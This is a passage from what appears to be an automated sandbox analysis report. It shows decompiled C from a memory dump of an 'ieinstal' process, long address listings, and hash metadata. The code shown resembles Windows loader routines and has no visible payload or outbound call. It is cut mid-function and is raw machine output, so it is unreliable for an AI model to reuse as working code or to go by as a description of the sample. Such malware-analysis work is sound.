													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E1ED1FFB0(_t287, _t353, 0x1edf84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E1ED5CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E1ED16600(0x1edf52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E1ED17926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x1edfb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E1ED8E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1edf8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x1edfb218; // 0x0
														asm("ror edi, cl");
														 *0x1edfb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E1ED22280(_t250, 0x1edf84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L1ED43898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E1ED1FFB0(_t293, _t353, 0x1edf84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E1ED437F5(_t353, 0);
																}
																E1ED40413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E1ED39B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E1ED302D6(_t174);
																}
																L1ED277F0( *0x1edf7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E1ED3C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L1ED1EC7F(_t353);
										L1ED319B8(_t287, 0, _t353, 0);
										_t200 = E1ED0F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E1ED4B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x1edfb2f8; // 0xa00000
									if((_t206 |  *0x1edfb2fc) == 0 || ( *0x1edfb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x1edfb2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E1EDB6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E1EDB6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E1ED1E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L1ED1EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E1ED49730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E1ED1E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L1ED18F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E1ED43C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                        0x1ed1d5f2
                        0x1ed1d5f5
                        0x1ed1d5f5
                        0x1ed1d5fd
                        0x1ed1d600
                        0x1ed1d60a
                        0x1ed1d60d
                        0x1ed1d617
                        0x1ed1d61d
                        0x1ed1d627
                        0x1ed1d62e
                        0x1ed1d911
                        0x1ed1d913
                        0x00000000
                        0x1ed1d919
                        0x1ed1d919
                        0x1ed1d919
                        0x1ed1d634
                        0x1ed1d634
                        0x1ed1d634
                        0x1ed1d634
                        0x1ed1d640
                        0x1ed1d8bf
                        0x00000000
                        0x1ed1d646
                        0x1ed1d646
                        0x1ed1d64d
                        0x1ed1d652
                        0x1ed6b2fc
                        0x1ed6b2fc
                        0x1ed6b302
                        0x1ed6b33b
                        0x1ed6b341
                        0x00000000
                        0x1ed6b304
                        0x1ed6b304
                        0x1ed6b319
                        0x1ed6b31e
                        0x1ed6b324
                        0x1ed6b326
                        0x1ed6b332
                        0x1ed6b347
                        0x1ed6b34c
                        0x1ed6b351
                        0x1ed6b35a
                        0x00000000
                        0x1ed6b328
                        0x1ed6b328
                        0x00000000
                        0x1ed6b328
                        0x1ed6b326
                        0x1ed1d658
                        0x1ed1d658
                        0x1ed1d65b
                        0x1ed1d665
                        0x00000000
                        0x1ed1d66b
                        0x1ed1d66b
                        0x1ed1d66b
                        0x1ed1d66b
                        0x1ed1d66d
                        0x1ed1d672
                        0x1ed1d67a
                        0x00000000
                        0x00000000
                        0x1ed1d680
                        0x1ed1d686
                        0x1ed1d8ce
                        0x1ed1d8d4
                        0x1ed1d8dd
                        0x1ed1d8e0
                        0x1ed1d68c
                        0x1ed1d691
                        0x1ed1d69d
                        0x1ed1d6a2
                        0x1ed1d6a7
                        0x1ed1d6b0
                        0x1ed1d6b5
                        0x1ed1d6e0
                        0x1ed1d6b7
                        0x1ed1d6b7
                        0x1ed1d6b9
                        0x1ed1d6b9
                        0x1ed1d6bb
                        0x1ed1d6bd
                        0x1ed1d6ce
                        0x1ed1d6d0
                        0x1ed1d6d2
                        0x1ed6b363
                        0x1ed6b365
                        0x00000000
                        0x1ed6b36b
                        0x00000000
                        0x1ed6b36b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed1d6bf
                        0x1ed1d6bf
                        0x1ed1d6e5
                        0x1ed1d6e7
                        0x1ed1d6e9
                        0x1ed1d6ec
                        0x1ed1d6ec
                        0x1ed1d6ef
                        0x1ed1d6f5
                        0x1ed1d6f9
                        0x1ed1d6fb
                        0x1ed1d6fd
                        0x1ed1d701
                        0x1ed1d703
                        0x1ed1d70a
                        0x1ed1d70a
                        0x1ed1d701
                        0x1ed1d710
                        0x1ed1d710
                        0x1ed1d6c1
                        0x1ed1d6c1
                        0x1ed1d6c6
                        0x1ed6b36d
                        0x1ed6b36f
                        0x00000000
                        0x1ed6b375
                        0x1ed6b375
                        0x1ed6b375
                        0x00000000
                        0x1ed6b375
                        0x00000000
                        0x1ed1d6cc
                        0x1ed1d6d8
                        0x1ed1d6d8
                        0x1ed1d6d8
                        0x00000000
                        0x1ed1d6c6
                        0x1ed1d6bf
                        0x00000000
                        0x1ed1d6da
                        0x1ed1d6da
                        0x1ed1d716
                        0x1ed1d71b
                        0x1ed1d720
                        0x1ed1d726
                        0x1ed1d726
                        0x1ed1d72d
                        0x00000000
                        0x1ed1d733
                        0x1ed1d739
                        0x1ed1d742
                        0x1ed1d750
                        0x1ed1d758
                        0x1ed1d764
                        0x1ed1d776
                        0x1ed1d77a
                        0x1ed1d783
                        0x1ed1d928
                        0x1ed1d92c
                        0x1ed1d93d
                        0x1ed1d944
                        0x1ed1d94f
                        0x1ed1d954
                        0x1ed1d956
                        0x1ed1d95f
                        0x1ed1d961
                        0x1ed1d973
                        0x1ed1d973
                        0x1ed1d956
                        0x1ed1d944
                        0x1ed1d92c
                        0x1ed1d78b
                        0x1ed6b394
                        0x1ed1d791
                        0x1ed1d798
                        0x1ed6b3a3
                        0x1ed6b3bb
                        0x1ed6b3bb
                        0x1ed1d7a5
                        0x1ed1d866
                        0x1ed1d870
                        0x1ed1d884
                        0x1ed1d892
                        0x1ed1d898
                        0x1ed1d89e
                        0x1ed1d8a0
                        0x1ed1d8a6
                        0x1ed1d8ac
                        0x1ed1d8ae
                        0x1ed1d8b4
                        0x1ed1d8b4
                        0x1ed1d8ae
                        0x1ed1d7a5
                        0x1ed1d78b
                        0x1ed1d7b1
                        0x1ed6b3c5
                        0x1ed6b3c5
                        0x1ed1d7c3
                        0x1ed1d7ca
                        0x1ed1d7e5
                        0x1ed1d7eb
                        0x1ed1d8eb
                        0x1ed1d8ed
                        0x00000000
                        0x1ed1d8f3
                        0x1ed1d8f3
                        0x1ed1d8f3
                        0x00000000
                        0x1ed1d8ed
                        0x1ed1d7cc
                        0x1ed1d7cc
                        0x1ed1d7d2
                        0x00000000
                        0x1ed1d7d4
                        0x1ed1d7d4
                        0x1ed1d7d7
                        0x1ed1d7df
                        0x1ed6b3d4
                        0x1ed6b3d9
                        0x1ed6b3dc
                        0x1ed6b3dc
                        0x1ed6b3df
                        0x1ed6b3e2
                        0x1ed6b468
                        0x1ed6b46d
                        0x1ed6b46f
                        0x1ed6b46f
                        0x1ed6b475
                        0x1ed1d8f8
                        0x1ed1d8f9
                        0x1ed1d8fd
                        0x1ed6b3e8
                        0x1ed6b3e8
                        0x1ed6b3eb
                        0x1ed6b3ed
                        0x00000000
                        0x1ed6b3ef
                        0x1ed6b3ef
                        0x1ed6b3f1
                        0x1ed6b3f4
                        0x1ed6b3fe
                        0x1ed6b404
                        0x1ed6b409
                        0x1ed6b40e
                        0x1ed6b410
                        0x1ed6b410
                        0x1ed6b414
                        0x1ed6b414
                        0x1ed6b41b
                        0x1ed6b420
                        0x1ed6b423
                        0x1ed6b425
                        0x1ed6b427
                        0x1ed6b42a
                        0x1ed6b42d
                        0x1ed6b42d
                        0x1ed6b42a
                        0x1ed6b432
                        0x1ed6b436
                        0x1ed6b438
                        0x1ed6b43b
                        0x1ed6b43b
                        0x1ed6b449
                        0x1ed6b44e
                        0x1ed6b454
                        0x1ed6b458
                        0x1ed6b458
                        0x1ed6b45d
                        0x00000000
                        0x1ed6b45d
                        0x1ed6b3ed
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed1d7df
                        0x1ed1d7d2
                        0x1ed1d7ca
                        0x1ed6b37c
                        0x1ed6b37e
                        0x1ed6b385
                        0x1ed6b38a
                        0x00000000
                        0x1ed6b38a
                        0x1ed1d742
                        0x1ed1d7f1
                        0x1ed1d7f8
                        0x1ed6b49b
                        0x1ed6b49b
                        0x1ed1d800
                        0x1ed1d837
                        0x1ed1d843
                        0x1ed1d845
                        0x1ed1d847
                        0x1ed1d84a
                        0x1ed1d84b
                        0x1ed1d84e
                        0x1ed1d857
                        0x1ed1d802
                        0x1ed1d802
                        0x1ed1d80d
                        0x00000000
                        0x1ed1d818
                        0x1ed1d818
                        0x1ed1d824
                        0x1ed1d831
                        0x1ed6b4a5
                        0x1ed6b4ab
                        0x1ed6b4b3
                        0x1ed6b4b8
                        0x1ed6b4bb
                        0x00000000
                        0x1ed6b4c1
                        0x1ed6b4c1
                        0x1ed6b4c8
                        0x00000000
                        0x1ed6b4ce
                        0x1ed6b4d4
                        0x1ed6b4e1
                        0x1ed6b4e3
                        0x1ed6b4e5
                        0x00000000
                        0x1ed6b4eb
                        0x1ed6b4f0
                        0x1ed6b4f2
                        0x1ed1dac9
                        0x1ed1dacc
                        0x1ed1dacf
                        0x1ed1dad1
                        0x1ed1dd78
                        0x1ed1dd78
                        0x1ed1dcf2
                        0x00000000
                        0x1ed1dad7
                        0x1ed1dad9
                        0x1ed1dadb
                        0x00000000
                        0x00000000
                        0x1ed1dae1
                        0x1ed1dae1
                        0x1ed1dae4
                        0x1ed1dae6
                        0x1ed6b4f9
                        0x1ed6b4f9
                        0x1ed6b500
                        0x1ed1daec
                        0x1ed1daec
                        0x1ed1daf5
                        0x1ed1daf8
                        0x1ed1dafb
                        0x1ed1db03
                        0x1ed1db11
                        0x1ed1db16
                        0x1ed1db19
                        0x1ed1db1b
                        0x1ed6b52c
                        0x1ed6b531
                        0x1ed6b534
                        0x1ed1db21
                        0x1ed1db21
                        0x1ed1db24
                        0x1ed1dcd9
                        0x1ed1dce2
                        0x1ed1dce5
                        0x1ed1dd6a
                        0x1ed1dd6d
                        0x00000000
                        0x1ed1dd73
                        0x1ed6b51a
                        0x1ed6b51c
                        0x1ed6b51f
                        0x1ed6b524
                        0x00000000
                        0x1ed6b524
                        0x1ed1dce7
                        0x1ed1dce7
                        0x1ed1dce7
                        0x00000000
                        0x1ed1dce7
                        0x00000000
                        0x1ed1db2a
                        0x1ed1db2c
                        0x1ed1db31
                        0x1ed1db33
                        0x1ed1db36
                        0x1ed1db39
                        0x1ed1db3b
                        0x1ed1db66
                        0x1ed1db66
                        0x1ed1db3d
                        0x1ed1db3d
                        0x1ed1db3e
                        0x1ed1db46
                        0x1ed1db47
                        0x1ed1db49
                        0x1ed1db4c
                        0x1ed1db53
                        0x1ed1db55
                        0x1ed1db58
                        0x1ed1db5a
                        0x1ed6b50a
                        0x1ed6b50f
                        0x1ed6b512
                        0x1ed1db60
                        0x1ed1db60
                        0x1ed1db63
                        0x1ed1db63
                        0x00000000
                        0x1ed1db63
                        0x1ed1db5a
                        0x1ed1db3b
                        0x1ed1db24
                        0x1ed1db69
                        0x1ed1db69
                        0x1ed1db6c
                        0x1ed1db6f
                        0x1ed1db74
                        0x1ed6b557
                        0x1ed6b557
                        0x1ed6b55e
                        0x1ed1db7a
                        0x1ed1db7c
                        0x1ed1db7f
                        0x1ed1db82
                        0x1ed1db85
                        0x00000000
                        0x1ed1db8b
                        0x1ed1db8b
                        0x1ed1db8d
                        0x1ed1db9b
                        0x1ed1db9b
                        0x1ed1db9d
                        0x1ed1dba0
                        0x1ed1dba2
                        0x1ed1dba4
                        0x1ed1dba7
                        0x1ed1dba9
                        0x1ed1dbae
                        0x1ed1dbae
                        0x1ed1dbb1
                        0x1ed1dbb4
                        0x1ed1dbb4
                        0x1ed1dbb7
                        0x1ed1dbba
                        0x1ed1dcd2
                        0x1ed1dcd4
                        0x00000000
                        0x1ed1dbc0
                        0x1ed1dbc0
                        0x1ed1dbd2
                        0x1ed1dbd7
                        0x1ed1dbda
                        0x1ed1dbdd
                        0x1ed1dbdf
                        0x00000000
                        0x1ed1dbe5
                        0x1ed1dbe5
                        0x1ed1dbee
                        0x1ed1dbf1
                        0x1ed6b541
                        0x1ed6b544
                        0x00000000
                        0x1ed6b546
                        0x1ed6b546
                        0x00000000
                        0x1ed6b546
                        0x1ed1dbf7
                        0x1ed1dbf7
                        0x1ed1dbfd
                        0x1ed1dbfd
                        0x1ed1dbff
                        0x1ed1dc0b
                        0x1ed1dc15
                        0x1ed1dc1b
                        0x1ed1dc1d
                        0x1ed1dc21
                        0x1ed1dc21
                        0x1ed1dc23
                        0x1ed1dc23
                        0x1ed1dc26
                        0x1ed1dc29
                        0x1ed1dc2b
                        0x00000000
                        0x00000000
                        0x1ed1dc31
                        0x1ed1dc34
                        0x1ed1dc36
                        0x1ed1dcbf
                        0x1ed1dcbf
                        0x1ed1dcc2
                        0x00000000
                        0x1ed1dc3c
                        0x1ed1dc41
                        0x1ed1dc43
                        0x00000000
                        0x1ed1dc45
                        0x1ed1dc45
                        0x1ed1dc47
                        0x00000000
                        0x1ed1dc4d
                        0x1ed1dc4d
                        0x1ed1dc50
                        0x1ed1dc52
                        0x1ed1dc55
                        0x1ed1dcfa
                        0x1ed1dcfe
                        0x1ed1dd08
                        0x1ed1dd0a
                        0x1ed1dd0c
                        0x00000000
                        0x1ed1dd12
                        0x1ed1dd15
                        0x1ed1dd2d
                        0x1ed1dd2f
                        0x1ed1dd32
                        0x1ed1dd35
                        0x00000000
                        0x1ed1dd35
                        0x1ed1dc5b
                        0x1ed1dc5b
                        0x1ed1dc5e
                        0x1ed1dc61
                        0x1ed1dc64
                        0x1ed1dc67
                        0x1ed1dc67
                        0x1ed1dc6a
                        0x1ed1dc6c
                        0x1ed1dc8e
                        0x1ed1dc8e
                        0x1ed1dc91
                        0x1ed1dc93
                        0x1ed1dcce
                        0x1ed1dcce
                        0x1ed1dc95
                        0x1ed1dc9c
                        0x1ed1dc6e
                        0x1ed1dc72
                        0x1ed1dc75
                        0x1ed1dc77
                        0x1ed1dc79
                        0x1ed6b551
                        0x1ed6b551
                        0x00000000
                        0x1ed1dc7f
                        0x1ed1dc7f
                        0x1ed1dc81
                        0x00000000
                        0x1ed1dc83
                        0x1ed1dc86
                        0x1ed1dc88
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed1dc88
                        0x1ed1dc81
                        0x1ed1dc79
                        0x1ed1dc6c
                        0x1ed1dc55
                        0x1ed1dc47
                        0x1ed1dc43
                        0x00000000
                        0x1ed1dc36
                        0x1ed1dc23
                        0x00000000
                        0x1ed1dbff
                        0x1ed1dbf1
                        0x1ed1dbdf
                        0x1ed1db8f
                        0x1ed1db92
                        0x1ed1db95
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed1db95
                        0x1ed1db8d
                        0x1ed1db85
                        0x1ed1db74
                        0x1ed1dc9f
                        0x1ed1dca2
                        0x1ed1dcb0
                        0x1ed1dcb0
                        0x1ed1dad1
                        0x1ed6b4e5
                        0x1ed6b4c8
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed1d831
                        0x1ed1d80d
                        0x00000000
                        0x1ed1d800
                        0x1ed6b47f
                        0x1ed6b485
                        0x00000000
                        0x1ed6b485
                        0x1ed1d665
                        0x1ed1d652
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f8d187d43ab7421a6603b2d41441d45e71a85f593443be3f1c260b25820c8f91
                        • Instruction ID: e5f3f71b0f262f07446e61601676f466f6e193160f072797cc9c2f9e00583a65
                        • Opcode Fuzzy Hash: f8d187d43ab7421a6603b2d41441d45e71a85f593443be3f1c260b25820c8f91
                        • Instruction Fuzzy Hash: ADE1C234A0039ACFDB20DF15D990BA9B7B2BF85305F1143A9D94A9F290D734ED86CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED1849B, Relevance: .3, Instructions: 290COMMON
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E1ED1849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x1eddf9c0);
				E1ED5D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1edf7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E1ED1CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E1ED22280( *[fs:0x30], 0x1edf8550);
						_t139 =  *0x1edf7b04; // 0x8
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E1ED3F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E1ED1FFB0(_t193, _t235, 0x1edf8550);
								L5:
								return E1ED5D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E1ED01C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1edf7b9c; // 0x0
							_t235 = L1ED24620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1edf7b10; // 0x10
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E1ED3A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E1ED1FFB0(_t193, _t235, 0x1edf8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
